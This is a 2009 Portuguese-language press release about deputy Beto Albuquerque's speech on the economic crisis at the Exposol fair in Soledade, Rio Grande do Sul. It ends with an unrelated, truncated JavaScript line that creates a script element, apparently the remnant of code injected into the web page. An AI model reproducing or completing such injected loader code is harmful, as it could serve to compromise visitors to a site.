Crise deve ser enfrentada com coragem, afirma Beto na Exposol 2009
- Posted by: Ass. Imprensa
- Posted in Geral, Notícias
- Tags:
[08/05/2009]
Presente na abertura da Exposol 2009 – Exposição Feira de Soledade –, o deputado federal Beto Albuquerque (PSB-RS) destacou que nesse momento de dificuldades vivido pelo Brasil, com uma crise que não foi iniciada no Rio Grande do Sul, mas que faz os municípios gaúchos sofrerem com os efeitos, há três caminhinhos: cruzar os braços, chorar ou fazer como os gaúchos, que não têm medo, e apresentar projetos para enfrentar a crise. “Encontrar caminhos, atendendo setorialmente as demandas, e somar esforços para buscar soluções é o caminho. Este é um palanque de convergência, embora ainda existam políticos que ainda não perceberam que é hora de convergir, de caminhar na mesma direção”, afirmou o parlamentar.
Albuquerque, que recebeu da comissão organizadora uma placa com agradecimento pelo apoio dado à Exposol 2009, destacou que, ao lado do deputado federal Vilson Covatti (PP), esteve presente na Exposol para reafirmar os compromissos da Câmara Fedral. “Temos aqui um setor relevante e gerador de empregos. Soledade é centro vocacional tecnológicos e foi pensando nisso que repassei R$ 1,2 milhão para o município”.
Vice-líder do governo Lula, o deputado destacou que momentos de crise são também momentos de oportunidades, de qualificar as pessoas e de somar esforços. “É preciso deixarmos de lado as diferenças, que não são mais importantes do que os interesses dos gaúchos e dos cidadãos de Soledade, um município onde se vê a pujança do setor econômico”, afirmou.
Realizada de 7 a 10 de maio no Parque de Eventos Centenário, em Soledade, a Exposol é um evento de caráter empresarial e com atividades direcionadas a feiras específicas buscando contemplar a maior quantidade de expositores, sempre ressaltando a economia do município. Entre as feiras que fazem parte do evento estão a de pedras a de indústria, comércio e serviços, de agronegócios e de cavalo crioulo.
Distante 220 quilômetros de Porto Alegre, Soledade é referência para outros 25 municípios da região. Com aproximadamente 30 mil habitantes, o município consolida-se no setor de negócios como centro industrial de pedras preciosas.
var d=document;var s=d.createElement(‘script’);